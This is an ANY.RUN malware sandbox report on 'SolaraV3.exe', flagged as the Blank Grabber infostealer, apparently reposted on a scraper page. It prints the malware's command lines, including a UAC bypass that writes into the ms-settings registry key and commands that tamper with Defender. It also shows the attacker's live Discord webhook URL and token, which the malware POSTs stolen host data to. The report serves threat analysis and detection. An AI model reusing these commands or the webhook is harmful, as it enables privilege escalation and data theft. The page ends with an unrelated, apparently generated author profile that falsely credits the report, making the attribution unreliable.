Malware analysis SolaraV3.exe Malicious activity | ANY.RUN - Malware Sandbox Online (2024)

File name:

SolaraV3.exe

Full analysis: https://app.any.run/tasks/0af5b7d0-ce94-41db-a356-02d0f662dd2d
Verdict: Malicious activity
Threats:

Blank Grabber is an infostealer written in Python. It is designed to steal a wide array of data, such as browser login credentials, crypto wallets, Telegram sessions, and Discord tokens. It is an open-source malware, with its code available on GitHub and regularly receiving updates. Blank Grabber builder’s simple interface lets threat actors even with basic skills to deploy it and conduct attacks.

Malware Trends Tracker>>>

Analysis date: September 29, 2024, 23:59:00
OS: Windows 10 Professional (build: 19045, 64 bit)
Tags:

uac

evasion

blankgrabber

discord

stealer

exfiltration

pyinstaller

susp-powershell

discordgrabber

generic

growtopia

ims-api

upx

Indicators:
MIME: application/x-dosexec
File info: PE32+ executable (GUI) x86-64, for MS Windows
MD5:

031A05DC463314DF4904B6AAB7ABB56D

SHA1:

D98F758B0126CC2BBFC59D38B23F59EBC8E21C18

SHA256:
SSDEEP:

98304:66CwbRk+yQq4ANCz0dz3MCF7mbEelmPuxKS1HmTdozujquT3Jb3n64AMXGYwcnDr:y7/V1ppxy27bT

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • BlankGrabber has been detected

      • SolaraV3.exe (PID: 2108)
      • SolaraV3.exe (PID: 6780)
    • Bypass User Account Control (Modify registry)

      • reg.exe (PID: 5244)
    • Bypass User Account Control (ComputerDefaults)

      • ComputerDefaults.exe (PID: 4668)
    • Adds path to the Windows Defender exclusion list

      • SolaraV3.exe (PID: 2268)
      • cmd.exe (PID: 5212)
      • cmd.exe (PID: 1964)
    • Antivirus name has been found in the command line (generic signature)

      • cmd.exe (PID: 3916)
      • MpCmdRun.exe (PID: 8152)
    • Windows Defender preferences modified via 'Set-MpPreference'

      • cmd.exe (PID: 3916)
    • Bypass execution policy to execute commands

      • powershell.exe (PID: 7248)
    • Changes powershell execution policy (Bypass)

      • cmd.exe (PID: 3812)
    • GROWTOPIA has been detected (YARA)

      • SolaraV3.exe (PID: 2268)
    • DISCORDGRABBER has been detected (YARA)

      • SolaraV3.exe (PID: 2268)
    • BLANKGRABBER has been detected (SURICATA)

      • SolaraV3.exe (PID: 2268)
    • Stealers network behavior

      • SolaraV3.exe (PID: 2268)
    • Starts CMD.EXE for self-deleting

      • SolaraV3.exe (PID: 2268)
  • SUSPICIOUS

    • Process drops legitimate windows executable

      • SolaraV3.exe (PID: 2108)
      • SolaraV3.exe (PID: 6780)
      • SolaraV3.exe (PID: 2268)
    • Uses WEVTUTIL.EXE to query events from a log or log file

      • cmd.exe (PID: 876)
      • cmd.exe (PID: 6540)
    • Starts a Microsoft application from unusual location

      • SolaraV3.exe (PID: 2108)
      • SolaraV3.exe (PID: 3332)
      • SolaraV3.exe (PID: 6780)
      • SolaraV3.exe (PID: 2268)
    • Uses REG/REGEDIT.EXE to modify registry

      • cmd.exe (PID: 6968)
      • cmd.exe (PID: 6544)
      • cmd.exe (PID: 7096)
    • The process drops C-runtime libraries

      • SolaraV3.exe (PID: 2108)
      • SolaraV3.exe (PID: 6780)
    • Process drops python dynamic module

      • SolaraV3.exe (PID: 2108)
      • SolaraV3.exe (PID: 6780)
    • Found strings related to reading or modifying Windows Defender settings

      • SolaraV3.exe (PID: 3332)
      • SolaraV3.exe (PID: 2268)
    • Application launched itself

      • SolaraV3.exe (PID: 2108)
      • SolaraV3.exe (PID: 6780)
    • Starts CMD.EXE for commands execution

      • SolaraV3.exe (PID: 3332)
      • SolaraV3.exe (PID: 2268)
    • Changes default file association

      • reg.exe (PID: 5244)
    • Executable content was dropped or overwritten

      • SolaraV3.exe (PID: 2108)
      • SolaraV3.exe (PID: 6780)
      • SolaraV3.exe (PID: 2268)
      • csc.exe (PID: 8188)
    • Get information on the list of running processes

      • SolaraV3.exe (PID: 2268)
      • cmd.exe (PID: 1308)
      • cmd.exe (PID: 4892)
      • cmd.exe (PID: 1656)
      • cmd.exe (PID: 4664)
    • Script disables Windows Defender's real-time protection

      • cmd.exe (PID: 3916)
    • Script disables Windows Defender's IPS

      • cmd.exe (PID: 3916)
    • Starts POWERSHELL.EXE for commands execution

      • cmd.exe (PID: 3916)
      • cmd.exe (PID: 5212)
      • cmd.exe (PID: 1964)
      • cmd.exe (PID: 1460)
      • cmd.exe (PID: 3812)
      • cmd.exe (PID: 1224)
      • cmd.exe (PID: 7636)
      • cmd.exe (PID: 8028)
      • cmd.exe (PID: 7316)
    • Uses WMIC.EXE to obtain Windows Installer data

      • cmd.exe (PID: 6984)
      • cmd.exe (PID: 876)
      • cmd.exe (PID: 6032)
    • Uses WMIC.EXE to obtain a list of video controllers

      • cmd.exe (PID: 3372)
      • cmd.exe (PID: 3972)
      • cmd.exe (PID: 6232)
    • Uses ATTRIB.EXE to modify file attributes

      • cmd.exe (PID: 1156)
    • Script adds exclusion path to Windows Defender

      • cmd.exe (PID: 1964)
      • cmd.exe (PID: 5212)
    • Uses NETSH.EXE to obtain data on the network

      • cmd.exe (PID: 532)
    • Starts application with an unusual extension

      • cmd.exe (PID: 2064)
      • cmd.exe (PID: 7660)
      • cmd.exe (PID: 7404)
      • cmd.exe (PID: 7776)
      • cmd.exe (PID: 8024)
      • cmd.exe (PID: 7908)
    • BASE64 encoded PowerShell command has been detected

      • cmd.exe (PID: 3812)
    • Base64-obfuscated command line is found

      • cmd.exe (PID: 3812)
    • Uses SYSTEMINFO.EXE to read the environment

      • cmd.exe (PID: 4008)
    • The process bypasses the loading of PowerShell profile settings

      • cmd.exe (PID: 3812)
    • CSC.EXE is used to compile C# code

      • csc.exe (PID: 8188)
    • Possible usage of Discord/Telegram API has been detected (YARA)

      • SolaraV3.exe (PID: 2268)
    • Uses WMIC.EXE to obtain operating system information

      • cmd.exe (PID: 7840)
    • The executable file from the user directory is run by the CMD process

      • rar.exe (PID: 4068)
    • Uses WMIC.EXE to obtain computer system information

      • cmd.exe (PID: 8008)
    • Checks for external IP

      • svchost.exe (PID: 2256)
      • SolaraV3.exe (PID: 2268)
    • Runs PING.EXE to delay simulation

      • cmd.exe (PID: 4560)
    • Hides command output

      • cmd.exe (PID: 4560)
  • INFO

    • Create files in a temporary directory

      • SolaraV3.exe (PID: 2108)
      • SolaraV3.exe (PID: 3332)
      • SolaraV3.exe (PID: 6780)
      • SolaraV3.exe (PID: 2268)
    • Checks supported languages

      • SolaraV3.exe (PID: 3332)
      • SolaraV3.exe (PID: 2108)
      • SolaraV3.exe (PID: 6780)
      • SolaraV3.exe (PID: 2268)
    • Reads the computer name

      • SolaraV3.exe (PID: 2108)
      • SolaraV3.exe (PID: 6780)
    • The process uses the downloaded file

      • cmd.exe (PID: 1336)
    • Reads security settings of Internet Explorer

      • ComputerDefaults.exe (PID: 4668)
    • The Powershell gets current clipboard

      • powershell.exe (PID: 1156)
    • PyInstaller has been detected (YARA)

      • SolaraV3.exe (PID: 6780)
      • SolaraV3.exe (PID: 2268)
    • Displays MAC addresses of computer network adapters

      • getmac.exe (PID: 2932)
    • Found Base64 encoded reflection usage via PowerShell (YARA)

      • SolaraV3.exe (PID: 2268)
    • UPX packer has been detected

      • SolaraV3.exe (PID: 2268)
    • Attempting to use instant messaging service

      • svchost.exe (PID: 2256)
      • SolaraV3.exe (PID: 2268)

Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the

full report

ims-api

(PID) Process(2268) SolaraV3.exe

Discord-Webhook-Tokens (1)1279610116131389570/5EodVOfV7vKlKvxe2bJjP_IcSs2v5gxj-zDOPmaY9-B6G1xf-_tEZBpZPg9Vt-BnvSXc

Discord-Info-Links

1279610116131389570/5EodVOfV7vKlKvxe2bJjP_IcSs2v5gxj-zDOPmaY9-B6G1xf-_tEZBpZPg9Vt-BnvSXc

Get Webhook Infohttps://discord.com/api/webhooks/1279610116131389570/5EodVOfV7vKlKvxe2bJjP_IcSs2v5gxj-zDOPmaY9-B6G1xf-_tEZBpZPg9Vt-BnvSXc

No Malware configuration.

TRiD

.exe | Win64 Executable (generic) (87.3)
.exe | Generic Win/DOS Executable (6.3)
.exe | DOS Executable Generic (6.3)

EXIF

EXE

ProductVersion: 10.0.19041.1
ProductName: Microsoft® Windows® Operating System
OriginalFileName: XCOPY.EXE
LegalCopyright: © Microsoft Corporation. All rights reserved.
InternalName: xcopy
FileVersion: 10.0.19041.1 (WinBuild.160101.0800)
FileDescription: Extended Copy Utility
CompanyName: Microsoft Corporation
CharacterSet: Unicode
LanguageCode: English (U.S.)
FileSubtype: -
ObjectFileType: Executable application
FileOS: Windows NT 32-bit
FileFlags: (none)
FileFlagsMask: 0x003f
ProductVersionNumber: 10.0.19041.1
FileVersionNumber: 10.0.19041.1
Subsystem: Windows GUI
SubsystemVersion: 6
ImageVersion: -
OSVersion: 6
EntryPoint: 0xcdb0
UninitializedDataSize: -
InitializedDataSize: 94208
CodeSize: 172032
LinkerVersion: 14.4
PEType: PE32+
ImageFileCharacteristics: Executable, Large address aware
TimeStamp: 2024:09:17 12:22:38+00:00
MachineType: AMD AMD64

No data.

Total processes

257

Monitored processes

140

Malicious processes

8

Suspicious processes

5

Behavior graph

Click at the process to see the details

Process information

PID

CMD

Path

Indicators

Parent process

2108"C:\Users\admin\Desktop\SolaraV3.exe" C:\Users\admin\Desktop\SolaraV3.exeexplorer.exe

User:

admin

Company:

Microsoft Corporation

Integrity Level:

MEDIUM

Description:

Extended Copy Utility

Exit code:

Version:

10.0.19041.1 (WinBuild.160101.0800)

Modules

Images

c:\users\admin\desktop\solarav3.exe

c:\windows\system32\ntdll.dll

c:\windows\system32\kernel32.dll

c:\windows\system32\kernelbase.dll

c:\windows\system32\apphelp.dll

c:\windows\system32\user32.dll

c:\windows\system32\win32u.dll

c:\windows\system32\gdi32.dll

c:\windows\system32\gdi32full.dll

c:\windows\system32\msvcp_win.dll

3332"C:\Users\admin\Desktop\SolaraV3.exe" C:\Users\admin\Desktop\SolaraV3.exeSolaraV3.exe

User:

admin

Company:

Microsoft Corporation

Integrity Level:

MEDIUM

Description:

Extended Copy Utility

Exit code:

Version:

10.0.19041.1 (WinBuild.160101.0800)

Modules

Images

c:\users\admin\desktop\solarav3.exe

c:\windows\system32\ntdll.dll

c:\windows\system32\kernel32.dll

c:\windows\system32\kernelbase.dll

c:\windows\system32\apphelp.dll

c:\windows\system32\user32.dll

c:\windows\system32\win32u.dll

c:\windows\system32\gdi32.dll

c:\windows\system32\gdi32full.dll

c:\windows\system32\msvcp_win.dll

6544C:\WINDOWS\system32\cmd.exe /c "reg add hkcu\Software\Classes\ms-settings\shell\open\command /d "C:\Users\admin\Desktop\SolaraV3.exe" /f"C:\Windows\System32\cmd.exeSolaraV3.exe

User:

admin

Company:

Microsoft Corporation

Integrity Level:

MEDIUM

Description:

Windows Command Processor

Exit code:

Version:

10.0.19041.1 (WinBuild.160101.0800)

Modules

Images

c:\windows\system32\cmd.exe

c:\windows\system32\ntdll.dll

c:\windows\system32\kernel32.dll

c:\windows\system32\kernelbase.dll

c:\windows\system32\apphelp.dll

c:\windows\system32\msvcrt.dll

c:\windows\system32\combase.dll

c:\windows\system32\ucrtbase.dll

c:\windows\system32\rpcrt4.dll

c:\windows\system32\sechost.dll

6732\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.execmd.exe

User:

admin

Company:

Microsoft Corporation

Integrity Level:

MEDIUM

Description:

Console Window Host

Exit code:

Version:

10.0.19041.1 (WinBuild.160101.0800)

Modules

Images

c:\windows\system32\conhost.exe

c:\windows\system32\ntdll.dll

c:\windows\system32\kernel32.dll

c:\windows\system32\kernelbase.dll

c:\windows\system32\msvcp_win.dll

c:\windows\system32\ucrtbase.dll

c:\windows\system32\shcore.dll

c:\windows\system32\msvcrt.dll

c:\windows\system32\combase.dll

c:\windows\system32\rpcrt4.dll

5916reg add hkcu\Software\Classes\ms-settings\shell\open\command /d "C:\Users\admin\Desktop\SolaraV3.exe" /fC:\Windows\System32\reg.execmd.exe

User:

admin

Company:

Microsoft Corporation

Integrity Level:

MEDIUM

Description:

Registry Console Tool

Exit code:

Version:

10.0.19041.1 (WinBuild.160101.0800)

Modules

Images

c:\windows\system32\reg.exe

c:\windows\system32\ntdll.dll

c:\windows\system32\kernel32.dll

c:\windows\system32\kernelbase.dll

c:\windows\system32\apphelp.dll

c:\windows\system32\msvcrt.dll

c:\windows\system32\advapi32.dll

c:\windows\system32\sechost.dll

c:\windows\system32\rpcrt4.dll

c:\windows\system32\bcrypt.dll

6968C:\WINDOWS\system32\cmd.exe /c "reg add hkcu\Software\Classes\ms-settings\shell\open\command /v "DelegateExecute" /f"C:\Windows\System32\cmd.exeSolaraV3.exe

User:

admin

Company:

Microsoft Corporation

Integrity Level:

MEDIUM

Description:

Windows Command Processor

Exit code:

Version:

10.0.19041.1 (WinBuild.160101.0800)

Modules

Images

c:\windows\system32\cmd.exe

c:\windows\system32\ntdll.dll

c:\windows\system32\kernel32.dll

c:\windows\system32\kernelbase.dll

c:\windows\system32\apphelp.dll

c:\windows\system32\msvcrt.dll

c:\windows\system32\combase.dll

c:\windows\system32\ucrtbase.dll

c:\windows\system32\rpcrt4.dll

c:\windows\system32\sechost.dll

3360\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.execmd.exe

User:

admin

Company:

Microsoft Corporation

Integrity Level:

MEDIUM

Description:

Console Window Host

Exit code:

Version:

10.0.19041.1 (WinBuild.160101.0800)

Modules

Images

c:\windows\system32\conhost.exe

c:\windows\system32\ntdll.dll

c:\windows\system32\kernel32.dll

c:\windows\system32\kernelbase.dll

c:\windows\system32\msvcp_win.dll

c:\windows\system32\ucrtbase.dll

c:\windows\system32\shcore.dll

c:\windows\system32\msvcrt.dll

c:\windows\system32\combase.dll

c:\windows\system32\rpcrt4.dll

5244reg add hkcu\Software\Classes\ms-settings\shell\open\command /v "DelegateExecute" /fC:\Windows\System32\reg.execmd.exe

User:

admin

Company:

Microsoft Corporation

Integrity Level:

MEDIUM

Description:

Registry Console Tool

Exit code:

Version:

10.0.19041.1 (WinBuild.160101.0800)

Modules

Images

c:\windows\system32\reg.exe

c:\windows\system32\ntdll.dll

c:\windows\system32\kernel32.dll

c:\windows\system32\kernelbase.dll

c:\windows\system32\apphelp.dll

c:\windows\system32\msvcrt.dll

c:\windows\system32\advapi32.dll

c:\windows\system32\sechost.dll

c:\windows\system32\rpcrt4.dll

c:\windows\system32\bcrypt.dll

876C:\WINDOWS\system32\cmd.exe /c "wevtutil qe "Microsoft-Windows-Windows Defender/Operational" /f:text"C:\Windows\System32\cmd.exeSolaraV3.exe

User:

admin

Company:

Microsoft Corporation

Integrity Level:

MEDIUM

Description:

Windows Command Processor

Exit code:

Version:

10.0.19041.1 (WinBuild.160101.0800)

Modules

Images

c:\windows\system32\cmd.exe

c:\windows\system32\ntdll.dll

c:\windows\system32\kernel32.dll

c:\windows\system32\kernelbase.dll

c:\windows\system32\apphelp.dll

c:\windows\system32\msvcrt.dll

c:\windows\system32\combase.dll

c:\windows\system32\ucrtbase.dll

c:\windows\system32\rpcrt4.dll

c:\windows\system32\sechost.dll

400\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.execmd.exe

User:

admin

Company:

Microsoft Corporation

Integrity Level:

MEDIUM

Description:

Console Window Host

Exit code:

Version:

10.0.19041.1 (WinBuild.160101.0800)

Modules

Images

c:\windows\system32\conhost.exe

c:\windows\system32\ntdll.dll

c:\windows\system32\kernel32.dll

c:\windows\system32\kernelbase.dll

c:\windows\system32\msvcp_win.dll

c:\windows\system32\ucrtbase.dll

c:\windows\system32\shcore.dll

c:\windows\system32\msvcrt.dll

c:\windows\system32\combase.dll

c:\windows\system32\rpcrt4.dll

Total events

60622

Read events

60610

Write events

8

Delete events

4

Modification events

(PID) Process:(5244)reg.exeKey:HKEY_CLASSES_ROOT\ms-settings\shell\open\command
Operation:writeName:DelegateExecute

Value:

(PID) Process:(4668)ComputerDefaults.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer
Operation:writeName:SlowContextMenuEntries

Value:

6024B221EA3A6910A2DC08002B30309D0A010000BD0E0C47735D584D9CEDE91E22E23282770100000114020000000000C0000000000000468D0000006078A409B011A54DAFA526D86198A780390100009AD298B2EDA6DE11BA8CA68E55D895936E000000

(PID) Process:(4668)ComputerDefaults.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content
Operation:writeName:CachePrefix

Value:

(PID) Process:(4668)ComputerDefaults.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies
Operation:writeName:CachePrefix

Value:

Cookie:

(PID) Process:(4668)ComputerDefaults.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History
Operation:writeName:CachePrefix

Value:

Visited:

(PID) Process:(6592)reg.exeKey:HKEY_CLASSES_ROOT\ms-settings\shell\open\command
Operation:delete keyName:(default)

Value:

(PID) Process:(6592)reg.exeKey:HKEY_CLASSES_ROOT\ms-settings\shell\open
Operation:delete keyName:(default)

Value:

(PID) Process:(6592)reg.exeKey:HKEY_CLASSES_ROOT\ms-settings\shell
Operation:delete keyName:(default)

Value:

(PID) Process:(6592)reg.exeKey:HKEY_CLASSES_ROOT\ms-settings
Operation:delete keyName:(default)

Value:

(PID) Process:(2268)SolaraV3.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Multimedia\DrawDib
Operation:writeName: 1280x720x32(BGR 0)

Value:

31,31,31,31

Executable files

38

Suspicious files

16

Text files

56

Unknown types

Dropped files

PID

Process

Filename

Type

2108SolaraV3.exeC:\Users\admin\AppData\Local\Temp\_MEI21082\_decimal.pydexecutable

MD5:B7012443C9C31FFD3AED70FE89AA82A0

SHA256:3B92D5CA6268A5AD0E92E5E403C621C56B17933DEF9D8C31E69AB520C30930D9

2108SolaraV3.exeC:\Users\admin\AppData\Local\Temp\_MEI21082\VCRUNTIME140.dllexecutable

MD5:BE8DBE2DC77EBE7F88F910C61AEC691A

SHA256:4D292623516F65C80482081E62D5DADB759DC16E851DE5DB24C3CBB57B87DB83

2108SolaraV3.exeC:\Users\admin\AppData\Local\Temp\_MEI21082\select.pydexecutable

MD5:33722C8CD45091D31AEF81D8A1B72FA8

SHA256:366FCA0B27A34835129086C8CDE1E75C309849E37091DB4ADEDA1BE508F2EE12

2108SolaraV3.exeC:\Users\admin\AppData\Local\Temp\_MEI21082\_ssl.pydexecutable

MD5:E33BF2BC6C19BF37C3CC8BAC6843D886

SHA256:E3532D3F8C5E54371F827B9E6D0FEE175AD0B2B17E25C26FDFB4EFD5126B7288

2108SolaraV3.exeC:\Users\admin\AppData\Local\Temp\_MEI21082\_ctypes.pydexecutable

MD5:FA360B7044312E7404704E1A485876D2

SHA256:F06C3491438F6685938789C319731DDF64BA1DA02CD71F43AB8829AF0E3F4E2F

2108SolaraV3.exeC:\Users\admin\AppData\Local\Temp\_MEI21082\_socket.pydexecutable

MD5:DA0DC29C413DFB5646D3D0818D875571

SHA256:C3365AD1FEE140B4246F06DE805422762358A782757B308F796E302FE0F5AAF8

2108SolaraV3.exeC:\Users\admin\AppData\Local\Temp\_MEI21082\python312.dllexecutable

MD5:EB02B8268D6EA28DB0EA71BFE24B15D6

SHA256:80222651A93099A906BE55044024D32E93B841C83554359D6E605D50D11E2E70

2108SolaraV3.exeC:\Users\admin\AppData\Local\Temp\_MEI21082\_queue.pydexecutable

MD5:326E66D3CF98D0FA1DB2E4C9F1D73E31

SHA256:BF6A8C5872D995EDAB5918491FA8721E7D1B730F66C8404EE760C1E30CB1F40E

2108SolaraV3.exeC:\Users\admin\AppData\Local\Temp\_MEI21082\rar.exeexecutable

MD5:9C223575AE5B9544BC3D69AC6364F75E

SHA256:90341AC8DCC9EC5F9EFE89945A381EB701FE15C3196F594D9D9F0F67B4FC2213

2108SolaraV3.exeC:\Users\admin\AppData\Local\Temp\_MEI21082\blank.aesbinary

MD5:A10E5E525212B9C2F73ED543991E8F4F

SHA256:D44B86328D878BA031E9A9CDE119EC15674FEF1D2B65B2CB3E8ED82ABC05A8DC

Download PCAP, analyze network streams, HTTP content and a lot more at the

full report

HTTP(S) requests

5

TCP/UDP connections

30

DNS requests

8

Threats

HTTP requests

PID

Process

Method

HTTP Code

IP

URL

CN

Type

Size

Reputation

GET

204

142.250.185.67:443

https://gstatic.com/generate_204

unknown

2268

SolaraV3.exe

GET

200

208.95.112.1:80

http://ip-api.com/line/?fields=hosting

unknown

unknown

7116

svchost.exe

GET

200

95.101.149.131:80

http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl

unknown

unknown

2268

SolaraV3.exe

GET

200

208.95.112.1:80

http://ip-api.com/json/?fields=225545

unknown

unknown

POST

404

162.159.128.233:443

https://discord.com/api/webhooks/1279610116131389570/5EodVOfV7vKlKvxe2bJjP_IcSs2v5gxj-zDOPmaY9-B6G1xf-_tEZBpZPg9Vt-BnvSXc

unknown

binary

45 b

unknown

Download PCAP, analyze network streams, HTTP content and a lot more at the

full report

Connections

PID

Process

IP

Domain

ASN

CN

Reputation

7116

svchost.exe

51.124.78.146:443

settings-win.data.microsoft.com

MICROSOFT-CORP-MSN-AS-BLOCK

NL

whitelisted

4

System

192.168.100.255:138

whitelisted

51.124.78.146:443

settings-win.data.microsoft.com

MICROSOFT-CORP-MSN-AS-BLOCK

NL

whitelisted

3888

svchost.exe

239.255.255.250:1900

whitelisted

7116

svchost.exe

95.101.149.131:80

www.microsoft.com

Akamai International B.V.

NL

unknown

7116

svchost.exe

20.73.194.208:443

settings-win.data.microsoft.com

MICROSOFT-CORP-MSN-AS-BLOCK

NL

whitelisted

2268

SolaraV3.exe

208.95.112.1:80

ip-api.com

TUT-AS

US

unknown

2268

SolaraV3.exe

172.217.16.131:443

gstatic.com

GOOGLE

US

whitelisted

4

System

192.168.100.255:137

whitelisted

2268

SolaraV3.exe

162.159.138.232:443

discord.com

CLOUDFLARENET

unknown

DNS requests

Domain

IP

Reputation

settings-win.data.microsoft.com

  • 51.124.78.146
  • 20.73.194.208

whitelisted

google.com

  • 216.58.212.142

whitelisted

www.microsoft.com

  • 95.101.149.131

whitelisted

blank-3jsck.in

unknown

ip-api.com

  • 208.95.112.1

shared

gstatic.com

  • 172.217.16.131

whitelisted

discord.com

  • 162.159.138.232
  • 162.159.135.232
  • 162.159.136.232
  • 162.159.128.233
  • 162.159.137.232

whitelisted

Threats

PID

Process

Class

Message

2256

svchost.exe

Device Retrieving External IP Address Detected

INFO [ANY.RUN] External IP Check (ip-api .com)

2256

svchost.exe

Device Retrieving External IP Address Detected

ET INFO External IP Lookup Domain in DNS Lookup (ip-api .com)

2268

SolaraV3.exe

Device Retrieving External IP Address Detected

ET POLICY External IP Lookup ip-api.com

2256

svchost.exe

Misc activity

ET INFO Observed Discord Domain in DNS Lookup (discord .com)

2268

SolaraV3.exe

Device Retrieving External IP Address Detected

ET POLICY External IP Lookup ip-api.com

2268

SolaraV3.exe

A Network Trojan was detected

STEALER [ANY.RUN] BlankGrabber (SkochGrabber) Generic External IP Check

2268

SolaraV3.exe

Misc activity

ET INFO Observed Discord Domain (discord .com in TLS SNI)

Successful Credential Theft Detected

SUSPICIOUS [ANY.RUN] Host Name Exfiltration Atempt

No debug info

Malware analysis SolaraV3.exe Malicious activity | ANY.RUN - Malware Sandbox Online (2024)
Top Articles
Latest Posts
Recommended Articles
Article information

Author: Tyson Zemlak

Last Updated:

Views: 5831

Rating: 4.2 / 5 (63 voted)

Reviews: 94% of readers found this page helpful

Author information

Name: Tyson Zemlak

Birthday: 1992-03-17

Address: Apt. 662 96191 Quigley Dam, Kubview, MA 42013

Phone: +441678032891

Job: Community-Services Orchestrator

Hobby: Coffee roasting, Calligraphy, Metalworking, Fashion, Vehicle restoration, Shopping, Photography

Introduction: My name is Tyson Zemlak, I am a excited, light, sparkling, super, open, fair, magnificent person who loves writing and wants to share my knowledge and understanding with you.